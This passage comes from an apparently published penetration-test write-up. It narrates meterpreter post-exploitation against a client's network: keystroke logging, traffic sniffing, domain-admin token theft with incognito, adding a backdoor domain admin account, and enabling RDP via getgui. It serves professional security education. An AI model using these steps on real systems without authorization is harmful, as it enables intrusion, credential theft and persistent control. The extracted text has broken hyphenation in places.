The meterpreter has several useful extensions, one of them being the ‘’ps’’ command that gives us a list of all services running in the target system.
meterpreter > ps
Figure 2 is a listing of all the services of the oper-ating system retrieved using the meterpreter shell
Once you are able to retrieve the services, you can migrate to a different service by DLL injecting into that service. In Figure 2, you can see that we migrated into the explorer.exe process and started off a keystroke sniffer on the target system. Fig-ure 3 indicates the start of the keystroke service that can be invoked with keyscan_start. It can be dumped on the attacker’s local system with key-scan_dump.
We also ran a sniffer to sniff for traffic to and from the target system. This can be initialized with the use sniffer command, followed up with a sniffer_in-terfaces that lists all the available insniffer_in-terfaces on the target system, which is followed up with a sniffer_
start <interface number> <packet buffer size>.
Figure 4 is an image of us dumping the sniffer re-sults into a cap file after analysis on the target sys-tem. It can be run with the sniffer_dump command Perhaps the most useful command, and the one that gave us comprehensive access to the inside
network was the use of the incognito option in the meterpreter.
The incognito command in the meterpreter al-lows you to impersonate users on the network.
Windows systems use tokens as a measure of au-thentication and authorization while accessing a network. These tokens are not unlike web cookies that can be used by windows users to not have to constantly authenticate to gain access to network resources or system resources4. SYSTEM is the highest privilege in the tokens available in a target system.
Our first task was to identify if any tokens were listed and then potentially be stolen for us to go deeper into the organization5. We ran the com-mand use incognito to start using the options and commands under the module. Our first task was to identify the available delegation tokens that we could potentially steal.
Figure 5 shows the tokens available on the tar-get machine of which we stole the Administrator’s tokens on the company’s domain.
Once we had the domain administrator’s tokens, we were essentially the administrator of the do-main and the dodo-main was our next target.
The incognito module has an add_user option that allows the tester to add usernames and pass-words on the domain, and given the right creden-tials, add domain admin users to the domain as well, therefore, we didn’t resist. We added user we45 with password ‘we45’ to the domain and then added the user we45 to the list of Domain Admin-istrators.
Figure 6 displays the add_user option of the in-cognito module where user we45 was added to both the domain and the domain admins group.
Figure 4. Sniffer dump from the target system onto a cap file Figure 3. keyscan_start on meterpreter on the target system Figure 2. Services listing using the meterpreter shell
Figure 6. Adding users to domain and Domain Admins group
Figure 5. List of tokens available for impersonation
EXPLOITING WITH METASPLOIT
Now we had the ability to control the entire in-ternal infrastructure from outside the environment.
However, the fact that we didn’t have GUI access was a little inconvenient. We wanted to gain ac-cess via Remote Desktop Protocol (RDP) to the web application and subsequently generate an RDP session into the domain server, from where we could control the entire domain of the organi-zation.
Meterpreter has an option to enable RDP on the target system with the getui command. Therefore, we ran the following command:
run getgui –u we45 –p we45
This command gave us RDP access to the target system, after which we were created another Re-mote Desktop session to the domain server to ex-amine our proverbial ‘spoils of war’. Figure 7 and 8 are images of our RDP session into the domain server.
From then, it was only a matter of time before we could get complete access to the design
in-formation on the internal network. We egressed some information to evidence that we had been able to gain access to said information, ran clean-up scripts to ensure that the servers were not left in a weakened state after our analysis, immediately called their emergency contact person and warned him to remove all the shellcode executables, and user from the domain server6.
We had been able to execute an internal attack through a vulnerable web application. When we re-vealed our findings to the management, they were quite alarmed that we had been able to compre-hensively breach their internal network simply by gaining access to their web application.
Conclusion
The above article highlights some techniques that testers can use when compromising internal net-works being outside the network. However, while any tester faces an immense urge to skip the steps and move directly into exploitation, it is the patient and the meticulous testers that will find the best results. A consistent and repeatable a methodol-ogy is an absolute essential for a pen-tester. A tes-ter who follows the methodology and is skilled at analyzing and interpreting a given situation will put tools to the best use.
Another important learning that my own team had from this test was that gaining root on a box is perhaps the beginning of a test and not the end or sole objective of it. Attackers are constantly look-ing to create deeper levels of access into an or-ganization’s infrastructure. We, as pentesters must apply the same level of drive and determination to reach a data oriented goal (in this case Design In-formation).
ABHAY BHARGAV
Abhay Bhargav is the CTO of we45 Solutions India Pvt.
Ltd, a focused Information Security Company (www.
we45.com). We45 provides security consulting, testing and training services and handles Vulnerability Assess-ment and Penetration Testing projects for Infrastruc-ture and Apps of Fortune 1000 companies. He can be reached at [email protected], On twitter at @abhayb-hargav and LinkedIn at http://in.linkedin.com/in/abhay-bhargav. He is the co-author of ‘’Secure Java for Web Application Development’’ and is currently authoring
‘’PCI Compliance – A Definitive Guide’’
Figure 7. RDP access to the domain server
Figure 8. Access to the Active Directory Users in the Domain Server